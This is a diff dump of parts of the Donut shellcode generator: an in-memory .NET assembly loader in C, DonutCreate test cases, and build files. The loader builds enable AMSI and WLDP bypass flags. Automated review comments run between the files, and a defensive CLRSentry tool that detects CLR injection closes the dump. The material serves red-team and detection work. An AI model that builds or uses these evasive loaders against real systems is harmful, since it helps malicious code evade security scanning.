61 IID_ICorRuntimeHost,
62 (LPVOID*)&icrh);
63
64 if(FAILED(hr)) return;
65
66 printf("ICorRuntimeHost::Start()\n");
67 hr = icrh->Start();
68 if(SUCCEEDED(hr)) {
69 printf("ICorRuntimeHost::GetDefaultDomain()\n");
70 hr = icrh->GetDefaultDomain(&iu);
71 if(SUCCEEDED(hr)) {
72 printf("IUnknown::QueryInterface()\n");
73 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
74 if(SUCCEEDED(hr)) {
75 sab.lLbound = 0;
76 sab.cElements = len;
77 printf("SafeArrayCreate()\n");
78 sa = SafeArrayCreate(VT_UI1, 1, &sab);
79 if(sa != NULL) {
80 CopyMemory(sa->pvData, code, len);
81 printf("AppDomain::Load_3()\n");
82 hr = ad->Load_3(sa, &as);
83 if(SUCCEEDED(hr)) {
84 printf("Assembly::get_EntryPoint()\n");
85 hr = as->get_EntryPoint(&mi);
86 if(SUCCEEDED(hr)) {
87 v1.vt = VT_NULL;
88 v1.plVal = NULL;
89 printf("MethodInfo::Invoke_3()\n");
90 hr = mi->Invoke_3(v1, NULL, &v2);
91 mi->Release();
92 }
93 as->Release();
94 }
95 SafeArrayDestroy(sa);
96 }
97 ad->Release();
98 }
99 iu->Release();
100 }
101 icrh->Stop();
102 }
103 icrh->Release();
104 }
105
106 int main(int argc, char *argv[])
107 {
108 void *mem;
109 struct stat fs;
110 FILE *fd;
111
112 if(argc != 2) {
113 printf("usage: rundotnet <.NET assembly>\n");
114 return 0;
115 }
116
117 // 1. get the size of file
118 stat(argv[1], &fs);
119
120 if(fs.st_size == 0) {
121 printf("file is empty.\n");
122 return 0;
123 }
124
125 // 2. try open assembly
126 fd = fopen(argv[1], "rb");
127 if(fd == NULL) {
128 printf("unable to open \"%s\".\n", argv[1]);
129 return 0;
130 }
131 // 3. allocate memory
132 mem = malloc(fs.st_size);
133 if(mem != NULL) {
134 // 4. read file into memory
135 fread(mem, 1, fs.st_size, fd);
136 // 5. run the program from memory
137 rundotnet(mem, fs.st_size);
138 // 6. free memory
139 free(mem);
140 }
141 // 7. close assembly
142 fclose(fd);
143
144 return 0;
145 }
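Review bot: `stat(argv[1], &fs)` at rendered line 118 ignores its return value, so for a path that does not exist `fs.st_size` is read uninitialized on the next line before `fopen` ever gets to report the error; guard it with `if(stat(argv[1], &fs) != 0) { printf("unable to stat \"%s\".\n", argv[1]); return 0; }`. The `fread` result at line 135 is likewise unchecked, so a short read hands `rundotnet` a buffer whose tail is uninitialized heap. In `rundotnet`, `v2` receives the return VARIANT of `Invoke_3` but is never released with `VariantClear`, and `sab.cElements = len` narrows a `size_t` to the bound's `ULONG` field without a range check. `sa->pvData` is written directly rather than through `SafeArrayAccessData`/`SafeArrayUnaccessData`, which is the documented way to lock the buffer before copying into it.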
+0
-88
DonutTest/testcase.c less more
0
1
2 // just some simple test cases to use with donut library
3
4 #include "donut.h"
5
6 typedef struct _test_case_t {
7 int arch;
8 int bypass;
9 int inst_type;
10 char *domain;
11 char *cls;
12 char *method;
13 char *param;
14 char *file;
15 char *url;
16 char *runtime;
17 int err; // expected result based on test case
18 } test_case;
19
20 test_case tests[] = {
21 // nothing supplied
22 {0,0,0,"","","","","","","",DONUT_ERROR_INVALID_PARAMETER},
23 // requesting x86 shellcode for x64 DLL
24 {DONUT_ARCH_X86,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","cls","method","param","hello_amd64.dll","","",DONUT_ERROR_ARCH_MISMATCH},
25 // requesting x64 shellcode for x86 DLL
26 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","","hello_x86.dll","","",DONUT_ERROR_ARCH_MISMATCH},
27 // supplying parameters for unmanaged DLL, but not function name
28 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_PARAM},
29 // supplying function name that can't be found in DLL
30 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","NoMethod","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_FUNCTION},
31 // supplying file that isn't recognized
32 {DONUT_ARCH_ANY,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"","","","","/dev/null","","",DONUT_ERROR_FILE_INVALID},
33 // .NET DLL assembly with no method provided
34 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","","","class1.dll","","",DONUT_ERROR_NET_PARAMS},
35 // .NET DLL assembly with no class provided
36 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_NET_PARAMS},
37 // .NET DLL with good parameters
38 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_SUCCESS},
39 // invalid URL
40 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http:","",DONUT_ERROR_INVALID_URL},
41 // invalid URL length
42 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http://","",DONUT_ERROR_URL_LENGTH},
43 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://","",DONUT_ERROR_URL_LENGTH},
44 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://a","",DONUT_ERROR_SUCCESS},
45 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll",
46 "https://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
47 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
48 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
49 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
50 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
51 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
52 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
53 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
54 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
55 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
56 "",DONUT_ERROR_URL_LENGTH},
57 };
58
59 int main(void)
60 {
61 DONUT_CONFIG c;
62 int err, i;
63
64 for(i=0; i<sizeof(tests)/sizeof(test_case); i++) {
65 memset(&c, 0, sizeof(c));
66
67 c.arch = tests[i].arch;
68 c.bypass = tests[i].bypass;
69 c.inst_type = tests[i].inst_type;
70
71 strncpy(c.domain , tests[i].domain, sizeof(c.domain) - 1);
72 strncpy(c.cls , tests[i].cls, sizeof(c.cls) - 1);
73 strncpy(c.method , tests[i].method, sizeof(c.method) - 1);
74 strncpy(c.param , tests[i].param, sizeof(c.param) - 1);
75 strncpy(c.file , tests[i].file, sizeof(c.file) - 1);
76 strncpy(c.url , tests[i].url, sizeof(c.url) - 1);
77 strncpy(c.runtime, tests[i].runtime, sizeof(c.runtime) - 1);
78
79 printf("Test Case # %2i ", (i+1));
80 err = DonutCreate(&c);
81 DonutDelete(&c);
82
83 printf("returned %2i : %s\n",
84 err, err == tests[i].err ? "OK" : "FAILED");
85 }
86 return 0;
87 }
22 include LICENSE
33 include version-release-notes.txt
44 recursive-include . *.c
5 recursive-include payload *
5 recursive-include loader *
66 recursive-include include *
77 recursive-include docs *
8 recursive-include lib *
8 recursive-include lib *
0 donut:
1 gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
2 gcc -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c payload/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o clib.o
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o clib.o
5 debug:
6 gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
0 donut: clean
1 gcc -Wunused-function -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c -odonut lib/aplib64.a
2 gcc -Wunused-function -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c format.c loader/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o format.o clib.o lib/aplib64.a
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o format.o clib.o lib/aplib64.a
5 debug: clean
6 gcc -Wunused-function -ggdb -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.a -odonut
7 hash:
8 gcc -Wall -Wno-format -fpack-struct=8 -DTEST -I include hash.c loader/clib.c -ohash
9 encrypt:
10 gcc -Wall -Wno-format -fpack-struct=8 -DTEST -I include encrypt.c loader/clib.c -oencrypt
711 clean:
8 rm *.o donut lib/libdonut.a lib/libdonut.so
12 rm -f loader.exe exe2h.exe exe2h loader32.exe loader64.exe donut.o hash.o encrypt.o format.o clib.o hash encrypt donut hash.exe encrypt.exe donut.exe lib/libdonut.a lib/libdonut.so
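Review bot: The `donut` binary and both `libdonut.a`/`libdonut.so` now link the prebuilt archive `lib/aplib64.a` (presumably the aPLib decompressor that pairs with `loader/depack.c`) straight from the tree, and nothing in the build records where that blob came from or checks that it has not been altered. A prebuilt object linked into a shellcode generator is exactly the artefact a downstream packager wants pinned: add a comment naming the library version and origin, ship `lib/aplib64.a.sha256`, and have the `donut` and `debug` targets depend on a check such as `sha256sum --quiet -c lib/aplib64.a.sha256` before the link lines. As a smaller style point, `-Wunused-function` on the same lines is already implied by `-Wall`.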
0 donut:
1 x86_64-w64-mingw32-gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
2 debug:
3 x86_64-w64-mingw32-gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
0 CC32 := i686-w64-mingw32-gcc
1 CC64 := x86_64-w64-mingw32-gcc
2
3 donut: clean
4 $(info ###### RELEASE ######)
5 gcc -I include loader/exe2h/exe2h.c -oexe2h
6 $(CC64) -I include loader/exe2h/exe2h.c loader/exe2h/mmap-windows.c -lshlwapi -oexe2h.exe
7
8 $(CC32) -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib loader/loader.c loader/depack.c loader/clib.c hash.c encrypt.c -I include -oloader.exe
9 ./exe2h loader.exe
10
11 $(CC64) -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib loader/loader.c loader/depack.c loader/clib.c hash.c encrypt.c -I include -oloader.exe
12 ./exe2h loader.exe
13
14 $(CC64) -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.lib -odonut.exe
15 debug: clean
16 $(info ###### DEBUG ######)
17 $(CC32) -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c -oloader32.exe -lole32 -lshlwapi
18 $(CC64) -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c -oloader64.exe -lole32 -lshlwapi
19 $(CC64) -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.lib -odonut.exe
420 clean:
5 rm donut.exe *.o
21 rm -f exe2h exe2h.exe loader.bin instance donut.o hash.o encrypt.o format.o clib.o hash encrypt donut hash.exe encrypt.exe donut.exe lib/libdonut.a lib/libdonut.so loader.exe loader32.exe loader64.exe
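Review bot: `$(CC64) ... -oexe2h.exe` builds a Windows exe2h that nothing in this Makefile invokes — both extraction steps run the host-built `./exe2h`, and `clean` then deletes the `.exe` again — so it is dead build work, and on a host without a native `gcc` the recipe fails at the host build even though a cross-built tool exists. Either drop that line or select the tool once, e.g. `EXE2H ?= ./exe2h` at the top and `$(EXE2H) loader.exe` in place of the two `./exe2h loader.exe` calls, so an MSYS user can point it at `exe2h.exe`. Note also that the two release loader compiles carry no `-Wall`, unlike the generator line below them; the loader is the code that ends up as shellcode, so it is the one where warnings are worth seeing.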
0 donut:
1 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
2 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
3 move donut.lib lib/donut.lib
4 move donut.exp lib/donut.exp
5 move donut.dll lib/donut.dll
6 debug:
7 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
8 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
9 move donut.lib lib/donut.lib
10 move donut.exp lib/donut.exp
11 move donut.dll lib/donut.dll
0 donut: clean
1 @echo ###### Building exe2h ######
2 cl /nologo loader\exe2h\exe2h.c loader\exe2h\mmap-windows.c
3
4 @echo ###### Building loader ######
5 cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include loader\loader.c hash.c encrypt.c loader\depack.c loader\clib.c
6 link -nologo -order:@loader\order.txt -entry:DonutLoader -fixed -subsystem:console -nodefaultlib loader.obj hash.obj encrypt.obj depack.obj clib.obj
7 exe2h loader.exe
8
9 @echo ###### Building generator ######
10 rc include/donut.rc
11 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib include/donut.res
12 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
13 move donut.lib lib\donut.lib
14 move donut.exp lib\donut.exp
15 move donut.dll lib\donut.dll
16 debug: clean
17 cl /nologo -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c
18 link -nologo -order:@loader\order.txt -subsystem:console loader.obj hash.obj encrypt.obj depack.obj clib.obj
19
20 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
21 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
22 move donut.lib lib\donut.lib
23 move donut.exp lib\donut.exp
24 move donut.dll lib\donut.dll
25 hash:
26 cl -Zp8 -nologo -DTEST -I include hash.c loader\clib.c
27 encrypt:
28 cl -Zp8 -nologo -DTEST -I include encrypt.c
1229 clean:
13 del *.obj *.bin donut.exe lib/donut.exp lib/donut.lib lib/donut.dll
30 @del /Q mmap-windows.obj donut.obj hash.obj encrypt.obj depack.obj format.obj clib.obj hash.exe encrypt.exe donut.exe lib\libdonut.lib lib\libdonut.dll
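Review bot: The new `clean` recipe deletes `lib\libdonut.lib lib\libdonut.dll`, but the build above moves its outputs to `lib\donut.lib`, `lib\donut.exp` and `lib\donut.dll`, so the generator DLL is never cleaned any more — the old recipe did remove `lib/donut.exp lib/donut.lib lib/donut.dll` — and `loader.exe`, `exe2h.exe`, `include\donut.res` and the `*.bin` the old recipe covered are left behind too. Suggest `@del /Q *.obj *.bin include\donut.res loader.exe exe2h.exe hash.exe encrypt.exe donut.exe lib\donut.lib lib\donut.exp lib\donut.dll`. Stale `donut.dll` in `lib\` is easy to pick up by mistake when the next build's DLL step fails.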
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover
3 All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 1. Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 3. Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{361C69F5-7885-4931-949A-B91EEAB170E3}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>ModuleMonitor</RootNamespace>
9 <AssemblyName>ModuleMonitor</AssemblyName>
10 <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <Deterministic>true</Deterministic>
13 <TargetFrameworkProfile />
14 </PropertyGroup>
15 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 <PlatformTarget>AnyCPU</PlatformTarget>
17 <DebugSymbols>true</DebugSymbols>
18 <DebugType>full</DebugType>
19 <Optimize>false</Optimize>
20 <OutputPath>bin\Debug\</OutputPath>
21 <DefineConstants>DEBUG;TRACE</DefineConstants>
22 <ErrorReport>prompt</ErrorReport>
23 <WarningLevel>4</WarningLevel>
24 <Prefer32Bit>false</Prefer32Bit>
25 </PropertyGroup>
26 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 <PlatformTarget>AnyCPU</PlatformTarget>
28 <DebugType>pdbonly</DebugType>
29 <Optimize>true</Optimize>
30 <OutputPath>bin\Release\</OutputPath>
31 <DefineConstants>TRACE</DefineConstants>
32 <ErrorReport>prompt</ErrorReport>
33 <WarningLevel>4</WarningLevel>
34 <Prefer32Bit>false</Prefer32Bit>
35 </PropertyGroup>
36 <PropertyGroup>
37 <ApplicationManifest>app.manifest</ApplicationManifest>
38 </PropertyGroup>
39 <ItemGroup>
40 <Reference Include="System" />
41 <Reference Include="System.Core" />
42 <Reference Include="System.Management" />
43 <Reference Include="System.Xml.Linq" />
44 <Reference Include="System.Data.DataSetExtensions" />
45 <Reference Include="System.Data" />
46 <Reference Include="System.Xml" />
47 </ItemGroup>
48 <ItemGroup>
49 <Compile Include="Program.cs" />
50 <Compile Include="Properties\AssemblyInfo.cs" />
51 </ItemGroup>
52 <ItemGroup>
53 <None Include="app.config" />
54 <None Include="app.manifest" />
55 </ItemGroup>
56 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
57 </Project>
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
3 <StartArguments>--clr-sentry</StartArguments>
4 </PropertyGroup>
5 </Project>
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ModuleMonitor", "ModuleMonitor.csproj", "{361C69F5-7885-4931-949A-B91EEAB170E3}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {B18C8887-D713-4379-A365-35C9C89A1C36}
23 EndGlobalSection
24 EndGlobal
0 /* Name: ModuleMonitor
1 *
2 *
3 *
4 *
5 *
6 *
7 */
8
9 using System;
10 using System.Linq;
11 using System.Collections.Generic;
12 using System.Diagnostics;
13 using System.Management;
14 using System.Runtime.InteropServices;
15 using System.Security.Principal;
16
17 namespace CLRSentry
18 {
19 class Program
20 {
21 //TODO: Rename projec to ModuleMonitor, and add a --clrssentry option to watch for CLR injection
22 static void Main(string[] args)
23 {
24 if (args.Contains("-h") || args.Contains("--help"))
25 {
26 PrintUsage();
27
28 Environment.Exit(0);
29 }
30
31
32 if (args.Contains("--clr-sentry"))
33 {
34 CLRSentry();
35 }
36 else
37 {
38
39 MonitorModuleLoads();
40
41 }
42 }
43
44 /// <summary>
45 /// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace.
46 /// </summary>
47 public static void MonitorModuleLoads()
48 {
49 //Monitor without any filters
50 MonitorModuleLoads(new List<string>());
51 }
52
53 /// <summary>
54 /// Struct representing the WMI class Win32_ModuleLoadTrace
55 /// </summary>
56 [StructLayout(LayoutKind.Sequential)]
57 public struct Win32_ModuleLoadTrace
58 {
59 public sbyte[] SECURITY_DESCRIPTOR;
60 public UInt64 TIME_CREATED;
61 public string FileName;
62 public UInt64 DefaultBase;
63 public UInt64 ImageBase;
64 public UInt32 ImageChecksum;
65 public UInt64 ImageSize;
66 public UInt32 ProcessID;
67 public UInt32 TimeDateSTamp;
68 }
69
70
71 /// <summary>
72 /// Overload of GetNextModuleLoad that does not require filters.
73 /// </summary>
74 /// <returns></returns>
75 public static Win32_ModuleLoadTrace GetNextModuleLoad()
76 {
77 return GetNextModuleLoad(new List<string>());
78 }
79
80
81 /// <summary>
82 /// Get the details of the next module load
83 /// </summary>
84 /// <param name="filters">Filenames to filter for.</param>
85 /// <returns></returns>
86 public static Win32_ModuleLoadTrace GetNextModuleLoad(List<string> filters)
87 {
88 Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
89
90 //Ideally, we would filter here to reduce the amount of events that we have to consume.
91 //However, we cannot use the WHERE clause because the
92 var startWatch = new ManagementEventWatcher(new WqlEventQuery("SELECT * FROM Win32_ModuleLoadTrace"));
93
94 ManagementBaseObject e = startWatch.WaitForNextEvent();
95
96 //Instead, we filter here, because it's easy and we're a bit lazy
97 if (filters.Count == 0 ^ filters.Contains(((ManagementBaseObject)e)["FileName"].ToString()))
98 {
99 if (((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"] != null)
100 trace.SECURITY_DESCRIPTOR = (sbyte[])((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"];
101
102 if (((ManagementBaseObject)e)["TIME_CREATED"] != null)
103 trace.TIME_CREATED = (UInt64)((ManagementBaseObject)e)["TIME_CREATED"];
104
105 if (((ManagementBaseObject)e)["FileName"] != null)
106 trace.FileName = (string)((ManagementBaseObject)e)["FileName"];
107
108 if (((ManagementBaseObject)e)["DefaultBase"] != null)
109 trace.DefaultBase = (UInt64)((ManagementBaseObject)e)["DefaultBase"];
110
111 if (((ManagementBaseObject)e)["ImageBase"] != null)
112 trace.ImageBase = (UInt64)((ManagementBaseObject)e)["ImageBase"];
113
114 if (((ManagementBaseObject)e)["ImageChecksum"] != null)
115 trace.ImageChecksum = (UInt32)((ManagementBaseObject)e)["ImageChecksum"];
116
117 if (((ManagementBaseObject)e)["ImageSize"] != null)
118 trace.ImageSize = (UInt64)((ManagementBaseObject)e)["ImageSize"];
119
120 if (((ManagementBaseObject)e)["ProcessID"] != null)
121 trace.ProcessID = (UInt32)((ManagementBaseObject)e)["ProcessID"];
122
123 if (((ManagementBaseObject)e)["TimeDateSTamp"] != null)
124 trace.TimeDateSTamp = (UInt32)((ManagementBaseObject)e)["TimeDateSTamp"];
125
126 return trace;
127 }
128 else
129 return trace;
130 }
131
132 public static void CLRSentry()
133 {
134 //Sentries never sleep.
135 //UCMJ Article 113
136 /* Any sentinel or look-out who is found drunk or sleeping upon his post,
137 * or leaves it before he is regularly relieved, shall be punished,
138 * if the offense is committed in time of war, by death or such other punishment as a court-martial may direct,
139 * by if the offense is committed at any other time,
140 * by such punishment other than death as court-martial may direct.
141 */
142 while (true)
143 {
144 //Get the module load.
145 Win32_ModuleLoadTrace trace = GetNextModuleLoad();
146
147 //Split the
148 string[] parts = trace.FileName.Split('\\');
149
150 //Check whether it is a .NET Runtime DLL
151 if (parts[parts.Length - 1].Contains("msco"))
152 {
153 Process proc = Process.GetProcessById((int) trace.ProcessID);
154
155 //Check if the file is a .NET Assembly
156 if (!IsValidAssembly(proc.StartInfo.FileName))
157 {
158 //If it is not, then the CLR has been injected.
159 Console.WriteLine();
160
161 Console.WriteLine("[!] CLR Injection has been detected!");
162
163 //Display information from the event
164 Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
165 Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
166
167 DateTime time = new DateTime();
168 DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
169 time.ToLocalTime();
170
171 //TODO: Time is printing strangley
172 Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
173 //TODO: Convert to hex
174 Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
175 Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
176 Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
